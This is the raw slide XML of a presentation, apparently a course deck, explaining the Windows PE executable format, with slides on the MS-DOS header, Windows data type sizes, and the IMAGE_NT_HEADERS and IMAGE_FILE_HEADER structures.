              <a:rPr lang="ro-RO" smtClean="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5638800"/>
            <a:ext cx="3505200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="17"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO"/>
              <a:t>More about shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="17"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" smtClean="0"/>
              <a:t>Contact</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO"/>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496669"/>
            <a:ext cx="32385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PE File Format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="8610600" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Portable Executable (PE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>format is a file format for executables, object code, DLLs, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. This includes dynamic library references for linking, API export and import tables, resource management data and thread-local storage (TLS) data. On NT operating systems, the PE format is used for EXE, DLL, SYS (device driver), and other file types.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971800"/>
            <a:ext cx="6858000" cy="3518691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3143166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420469"/>
            <a:ext cx="54102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General PE File Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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1600200"/>
            <a:ext cx="3164747" cy="4893013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2502673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496669"/>
            <a:ext cx="36576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MS-DOS Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>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600200"/>
            <a:ext cx="8243502" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5867400"/>
            <a:ext cx="8153400" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MS-DOS header only, opened in a hex editor. Notable strings: it starts with “MZ” and it contains the following text: “This program cannot be run in DOS mode.”</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852696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496669"/>
            <a:ext cx="36576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MS-DOS Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>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230259122"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1219200" y="1676400"/>
          <a:ext cx="6691697" cy="3681731"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1052" name="Document" r:id="rId3" imgW="6099983" imgH="3356174" progId="Word.Document.12">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Document" r:id="rId3" imgW="6099983" imgH="3356174"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6691697" cy="3681731"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>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21188146"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="5638800"/>
          <a:ext cx="8153400" cy="594360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4076700"/>
                <a:gridCol w="4076700"/>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>BYTE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – 8 bits (1 byte), “unsigned char”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CHAR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – 8 bits (1 byte),  “char”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DWORD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  4 bytes (32 bits)  “unsigned long”</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>LONG</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  4 bytes (32 bits) “long”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ULONGLONG</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  8 bytes (64 bits) “unsigned long </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>long</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WORD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  2 bytes (16 bits) “unsigned short”</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1837280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496669"/>
            <a:ext cx="25146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PE Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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256" y="1800048"/>
            <a:ext cx="7645688" cy="4143552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6096000"/>
            <a:ext cx="8915400" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MS-DOS header specifies (e_lfanew) the start of PE header.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2228559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420469"/>
            <a:ext cx="46482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PE Header structures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS"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786776742"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1905000"/>
          <a:ext cx="4191000" cy="1219200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4191000"/>
              </a:tblGrid>
              <a:tr h="1219200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>typedef</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>struct</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> _IMAGE_NT_HEADERS </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DWORD Signature</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IMAGE_FILE_HEADER </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>FileHeader</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IMAGE_OPTIONAL_HEADER32 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OptionalHeader</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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> IMAGE_NT_HEADERS32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PIMAGE_NT_HEADERS32</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txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx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0421984"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4876800" y="1600200"/>
          <a:ext cx="3886200" cy="1984248"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3886200"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>typedef</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>struct</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> _IMAGE_FILE_HEADER </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WORD    Machine</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NumberOfSections</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>TimeDateStamp</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PointerToSymbolTable</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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NumberOfSymbols</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SizeOfOptionalHeader</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>    WORD    Characteristics</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1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
